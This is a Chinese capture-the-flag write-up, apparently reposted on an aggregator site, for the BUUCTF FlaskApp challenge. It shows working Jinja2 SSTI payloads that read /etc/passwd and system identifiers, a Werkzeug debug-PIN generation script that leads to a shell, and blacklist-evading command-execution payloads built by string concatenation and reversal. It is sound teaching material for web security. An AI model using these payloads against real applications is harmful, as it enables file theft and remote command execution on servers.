Flask的网站,这里的功能是Base64编码解码,并输出
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-1.png)
并且是存在SSTI的
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-2.png)
/hint 提示PIN码
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-3.png)
既然提示PIN,那应该是开启了Debug模式的,解密栏那里随便输入点什么报错看看,直接报错了,并且该Flask开启了Debug模式,需要PIN码
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-4.png)
参考ye1s师傅的:Flask debug模式下的 PIN 码安全性
可知,要获取PIN码需要知道以下几点:
-
username:运行该Flask程序的用户名 -
modname:模块名 -
getattr(app, '__name__', getattr(app.__class__, '__name__')):app名,值为Flask -
getattr(mod, '__file__', None):Flask目录下的一个app.py的绝对路径,这个值可以在报错页面看到。但有个需注意,Python3是app.py,Python2中是app.pyc。 -
str(uuid.getnode()):MAC地址,需要转换成十进制,读取这两个地址:/sys/class/net/eth0/address或者/sys/class/net/ens33/address -
get_machine_id():系统id
从报错中还能看出来使用了render_template_string()
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-5.png)
从这个render_template_string(tmp)看,应该是使用的jinja2引擎,编码{{config}},传入解密然后渲染执行
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-6.png)
WAF的黑名单:import、os、popen、flag、eval、*、?等
其实这里就可以使用拼接绕过了,但是我们还是先来试试获取PIN码GetShell的
首先通过报错就可以得知很多信息,Python3的环境以及:
-
modname:flask.app -
getattr(app, '__name__', getattr(app.__class__, '__name__')):Flask -
getattr(mod, '__file__', None):/usr/local/lib/python3.7/site-packages/flask/app.py
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-7.png)
接下来可以通过SSTI去文件读取其他信息,使用jinja2的控制结构语法构造
jinja2一共三种语法:
控制结构 {% %}
变量取值 {{ }}
注释 {# #}
jinja2的Python模板解释器在构建的时候考虑到了安全问题,删除了大部分敏感函数,相当于构建了一个沙箱环境。
但是一些内置函数和属性还是依然可以使用,而Flask的SSTI就是利用这些内置函数和属性相互组建来达到调用函数的目的,
从而绕过沙箱。
__class__ 返回调用的参数类型
__bases__ 返回基类列表
__mro__ 此属性是在方法解析期间寻找基类时的参考类元组
__subclasses__() 返回子类的列表
__globals__ 以字典的形式返回函数所在的全局命名空间所定义的全局变量与func_globals等价
__builtins__ 内建模块的引用,在任何地方都是可见的(包括全局),每个 Python 脚本都会自动加载,
这个模块包括了很多强大的 built-in 函数,例如eval, exec, open等等
遍历子类,寻找能读取文件的子类,然后构造
{% for x in {}.__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x.__init__.__globals__['__builtins__'].open('/etc/passwd').read() }}
{%endif%}
{%endfor%}
编码一下输入
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-8.png)
得到运行Flask的用户名:flaskweb
读Mac地址
{% for x in {}.__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x.__init__.__globals__['__builtins__'].open('/sys/class/net/eth0/address').read() }}
{%endif%}
{%endfor%}
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-9.png)
转换成十进制:
>>> int('d2936368b7c7', 16)
231530469832647
读系统id:1408f836b0ca514d796cbf8960e45fa1
{% for x in {}.__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x.__init__.__globals__['__builtins__'].open('/etc/machine-id').read() }}
{%endif%}
{%endfor%}
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-10.png)
然后根据前面的分析文章里面的生成脚本得到PIN码
import hashlib
from itertools import chain
probably_public_bits = [
'flaskweb'# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'231530469832647',# str(uuid.getnode()), /sys/class/net/eth0/address
'1408f836b0ca514d796cbf8960e45fa1'# get_machine_id(), /etc/machine-id
]
h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-11.png)
输入PIN码后可成功获取交互Shell
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-12.png)
然而这里有SSTI,即已经可以命令执行了
>>> ().__class__.__base__.__subclasses__()[149]
<class 'warnings.catch_warnings'>
>>> ().__class__.__base__.__subclasses__()[149].__init__.__globals__['__builtins__']['__import__']('os').__dict__['popen']('whoami').read()
'mochu7\\administrator\n'
>>>
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-13.png)
只需要绕过关键字过滤即可,例如拼接
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x.__init__.__globals__['__builtins__']['__imp' + 'ort__']('o'+'s').__dict__['po' + 'pen'] ('cat /this_is_the_f'+'lag.txt').read() }}
{%endif%}
{%endfor%}
例如逆序文章来源:https://www.toymoban.com/news/detail-731805.html
{% for x in ().__class__.__base__.__subclasses__() %}
{% if "warning" in x.__name__ %}
{{x.__init__.__globals__['__builtins__']['__tropmi__'[::-1]]('so'[::-1]).__dict__['nepop'[::-1]]('txt.galf_eht_si_siht/ tac'[::-1]).read()}}
{%endif%}
{%endfor%}
![[gyctf2020]flaskapp,CTF_WEB_Writeup,GYCTF2020,Flask,SSTI,Jinja2](https://imgs.yssmx.com/Uploads/2023/10/731805-14.png)
像这种关键字绕过,SSTI还有很多办法,感兴趣的可以自己研究文章来源地址https://www.toymoban.com/news/detail-731805.html
到了这里,关于BUUCTF:[GYCTF2020]FlaskApp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!
![BUUCTF闯关日记--[MRCTF2020]你传你呢(超详解)](https://imgs.yssmx.com/Uploads/2024/02/438525-1.png)
![[CTF/网络安全]BurpSuite爆破实战解题详析之BUUCTF Brute 1](https://imgs.yssmx.com/Uploads/2024/02/734711-1.png)
![[网络安全/CTF] BUUCTF极客大挑战2019PHP解题详析(Dirsearch使用实例+php反序列化)](https://imgs.yssmx.com/Uploads/2024/02/742922-1.png)
